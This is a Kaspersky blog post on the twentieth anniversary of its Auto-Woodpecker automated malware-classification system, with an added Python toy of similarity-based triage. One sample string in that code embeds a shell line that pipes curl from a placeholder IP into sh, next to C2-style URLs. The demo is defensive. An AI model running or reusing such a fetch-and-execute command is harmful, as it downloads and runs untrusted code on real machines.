
Auto-Woodpecker’s anniversary! | Kaspersky official blog


We live in the age of AI hype. Artificial intelligence is here, there, and everywhere – so promising, slightly mysterious, but undeniably guiding humanity toward a brighter future of technological singularity that is still somewhat incomprehensible and possibly a black hole.

Some readers might detect sarcasm in this statement – but that would be a mistake. Machine learning (ML) driven automation, neural networks, and other AI technologies have already taken over many industries. And there is more to come in the evolution of Homo sapiens. If you are interested in diving deeper into this topic, read up on the history of the various industrial revolutions: first, second, third, and even fourth.

In line with this trend, cybersecurity was perhaps one of the pioneers in adopting new, smart technologies. And what makes me particularly proud of this process is that our company was one of the first in the industry to successfully implement this bright AI-driven future. How else could we possibly handle nearly half a million new malicious programs appearing every single day as of early 2025? No education system in the world can produce enough experts to keep up with that. The only solution is to build intelligent systems capable of independently and highly accurately neutralizing cyberattacks. Experts are then left with only the most complex cases – and, of course, the challenging task of inventing and continuously improving these systems.

A few days ago, we celebrated an exciting anniversary. Twenty years ago, the prototype of our first AI/ML technology for automated malware analysis and for creating “detections” – antivirus updates that protect computers, gadgets, and other devices from new attacks – was born.

The technology was given a name that is quite odd at first glance – Avtodyatel, which translates as Auto-Woodpecker! But there is a simple explanation for it: within our team, security analysts were affectionately known as woodpeckers – tirelessly pecking away at viruses and processing streams of suspicious files. And then we added “Auto” to “Woodpecker” for the name of the tech designed to do that job automatically (incidentally, I was a woodpecker myself back then).

After digging through our archives, we found not only the birthdate of this first automation baby, but also some fascinating photos of the original plans for its creation. We even recalled its birthplace – the 14th floor of the Radiophysics building near the Planernaya metro station in northwest Moscow, where we rented office space at the time. So get comfortable, and I will tell you a fascinating story. It started kinda like this…

A quarter of a century ago, malicious programs were much rarer – and, paradoxically, far more sophisticated – than today’s typical malware, despite being written by pioneering enthusiasts, ingenious lone programmers, and cyber pranksters. This made researching them a real pleasure – every new virus taught you something new. Back then, like my fellow woodpeckers, I manually analyzed the stream of malicious programs – what would now be called “malware analysis”.

By that time, it was already difficult to compile all existing malware into a single reference book, as had been done back in 1992. But we still coped with the flow, and at the end of each work week I manually compiled the antivirus database updates.

However, over time, malware creation evolved from mere mischief and boundary-pushing into a full-fledged criminal industry. Cybercriminals no longer just wanted to infect as many computers as possible – they sought to profit from it. For example, they harvested email addresses from infected machines and sold them for spam distribution.

Sensing profit, these bad actors triggered exponential growth in malware production. But instead of inventing fundamentally new threats, they started mass-producing slightly modified versions of existing ones. And I realized we could not keep up manually; if we continued down this path, we would drown in an endless flood of cyber-garbage.

Fortunately, technological development at the time required much smaller investment and far less development time. You could simply buy some pizza (pineapple-topped, of course!), gather a few bright minds in a meeting room, and spend a couple of hours brainstorming project ideas. And so, on February 22, 2005, I assembled my colleagues to draw up plans for automating our malware analysts’ work.

Just take a look at this beauty!

Plans for automating our malware analysts’ work.

We had some primitive automation tools before, of course. But Auto-Woodpecker was the first system at a fundamentally new level:

  1. It freed up valuable experts from repetitive tasks, allowing them to focus on more advanced challenges.
  2. It massively scaled up operational efficiency.
  3. It helped highlight similar (or related) incidents for further analysis.

In simple terms, the system automatically received new files from agents (“crawlers”) that scanned websites, email traps, and network sensors. These files were then automatically unpacked and executed in a secure environment – an artificial setting designed to observe malware behavior.

There, the samples were analyzed by automated scanners, classified, and then compiled into antivirus databases.

The key challenge when encountering a new malware sample was determining whether it was a never-before-seen threat or simply a variation of a known one. That is where the file auto-classifier (marked as “FF” in the diagram above) came into play, using AI/ML principles – now an essential feature in nearly every cybersecurity product (apart from fraudulent ones).

It did not work perfectly at first, but it quickly improved. We systematically documented all our ideas, detailed how the subsystems would interact, how data would be exchanged, and how false positives would be handled. Then we rolled up our sleeves and got to work.
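To make the “variant or novel?” decision concrete, here is an added toy illustration of that triage step in Python. It is not Kaspersky’s FF classifier or any code from the original post: the feature (sets of byte 4-grams compared by Jaccard similarity), the 0.4 threshold, the “closer to a known clean file than to any family” guard, and every sample, including the shared packer stub, are constructed for this example. The point it adds beyond the paragraph is why the false-positive handling matters: a benign update that merely shares packer code with a known sample scores above the threshold against the malware family, and only the clean-set comparison keeps it from being auto-detected.

```python
"""Toy variant-vs-novel triage, loosely modelled on the pipeline described above.

Illustration only, not Kaspersky's FF classifier: the features, threshold and
all samples below are constructed for this example.
"""
from __future__ import annotations

import hashlib
from dataclasses import dataclass

NGRAM = 4  # byte n-gram size, small enough to keep the short toy samples meaningful


def ngrams(data: bytes, n: int = NGRAM) -> frozenset[bytes]:
    """Set of overlapping byte n-grams: a crude but order-aware fingerprint."""
    return frozenset(data[i:i + n] for i in range(len(data) - n + 1))


def jaccard(a: frozenset[bytes], b: frozenset[bytes]) -> float:
    """Set similarity in [0, 1]; 1.0 means identical n-gram sets."""
    union = a | b
    return len(a & b) / len(union) if union else 1.0


@dataclass(frozen=True)
class Verdict:
    label: str           # "known", "variant", "clean" or "unknown"
    family: str | None   # closest malware family, if one drove the decision
    score: float         # similarity that drove the decision
    reason: str


class Triage:
    """Exact-hash lookup first, then nearest-neighbour similarity with a clean-set guard."""

    def __init__(self, threshold: float = 0.4) -> None:
        self.threshold = threshold
        self.known: dict[str, str] = {}                        # sha256 -> family
        self.families: dict[str, list[frozenset[bytes]]] = {}  # family -> fingerprints
        self.clean_hashes: set[str] = set()
        self.clean_feats: list[frozenset[bytes]] = []

    @staticmethod
    def _sha256(data: bytes) -> str:
        return hashlib.sha256(data).hexdigest()

    def add_malware(self, family: str, data: bytes) -> None:
        self.known[self._sha256(data)] = family
        self.families.setdefault(family, []).append(ngrams(data))

    def add_clean(self, data: bytes) -> None:
        self.clean_hashes.add(self._sha256(data))
        self.clean_feats.append(ngrams(data))

    def classify(self, data: bytes) -> Verdict:
        digest = self._sha256(data)
        if digest in self.clean_hashes:
            return Verdict("clean", None, 1.0, "exact hash in clean set")
        if digest in self.known:
            return Verdict("known", self.known[digest], 1.0, "exact hash already detected")

        feats = ngrams(data)
        best_family, best_mal = None, 0.0
        for family, samples in self.families.items():
            for sample in samples:
                score = jaccard(feats, sample)
                if score > best_mal:
                    best_family, best_mal = family, score
        best_clean = max((jaccard(feats, c) for c in self.clean_feats), default=0.0)

        # False-positive guard: packer stubs and runtime code make unrelated files
        # look alike, so anything closer to known-clean than to any family is never
        # auto-detected, however high its malware score.
        if best_clean >= best_mal:
            if best_clean >= self.threshold:
                return Verdict("clean", None, best_clean, "closer to a known clean file")
            return Verdict("unknown", None, best_mal, "no confident match; escalate to analyst")
        if best_mal >= self.threshold:
            return Verdict("variant", best_family, best_mal, f"near-duplicate of {best_family}")
        return Verdict("unknown", None, best_mal, "no confident match; escalate to analyst")


# Constructed samples. STUB stands in for packer code shared by every file that
# went through the same packer, malicious or not.
STUB = b"packer stub: pushad; mov esi,src; lea edi,[esi+delta]; "
DROPPER_V1 = STUB + b"http://c2.example/gate.php?id="
DROPPER_V2 = STUB + b"http://c2.example/panel.php?id="    # same family, new C2 path
INSTALLER_V10 = STUB + b"installer v1.0 (c) Example Corp"
INSTALLER_V11 = STUB + b"installer v1.1 (c) Example Corp"  # benign update, same packer
NOVEL = b"\x7fELF\x02\x01\x01 socket connect execve /bin/sh -c 'curl http://198.51.100.7/x | sh'"


def run_demo() -> dict[str, Verdict]:
    triage = Triage(threshold=0.4)
    triage.add_malware("dropper", DROPPER_V1)
    triage.add_clean(INSTALLER_V10)
    return {
        "resubmitted": triage.classify(DROPPER_V1),    # known: exact hash
        "variant": triage.classify(DROPPER_V2),        # variant of "dropper"
        "clean_update": triage.classify(INSTALLER_V11),  # above threshold vs dropper, but clean wins
        "novel": triage.classify(NOVEL),               # unknown: hand to an analyst
    }


if __name__ == "__main__":
    for name, v in run_demo().items():
        print(f"{name:13s} {v.label:8s} {v.family or '-':8s} {v.score:.2f}  {v.reason}")
```

Run it and the installer update scores about 0.46 against the dropper family, above the 0.4 threshold, yet is released as clean because it scores about 0.91 against the known-good installer. Real systems use far richer features (unpacked code, behaviour from the sandbox, imports) than raw byte n-grams, but the shape of the decision, exact match, nearest known family, clean-set veto, then escalate, is the same.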

A few months later, the first version of Auto-Woodpecker went live.

The results were instant and dramatic. Previously, five of us manually analyzed around 300 malware samples per week – an impressive number at the time. But with Auto-Woodpecker our productivity skyrocketed. And as the technology improved, this skyrocketing just kept on… skyrocketing!

Before long, Auto-Woodpecker was processing the entire incoming stream – leaving only 2-5% of all suspicious files for manual expert review. Today, of course, our tools are far more advanced, and AI-driven technologies play an even bigger role in cybersecurity.

To give you a glimpse of how far we have come, here are just a few recent examples:

  • Kaspersky MLAD (Machine Learning for Anomaly Detection): a predictive analytics system that detects early signs of equipment failure, process disruptions, cyberattacks, and human error in industrial telemetry signals – long before they cause real damage.
  • Kaspersky MDR (Managed Detection and Response): this service has been using an AI analyst for several years to filter out false positives, reducing the workload on SOC specialists and allowing them to focus on complex threat investigations.
  • Kaspersky Threat Lookup: just last week we integrated a tool for finding contextual information on indicators of compromise using an AI-powered large language model.

The results speak for themselves, and we have even bigger plans ahead!…

Happy 20th Anniversary, Auto-Woodpecker!!

Cin cin!
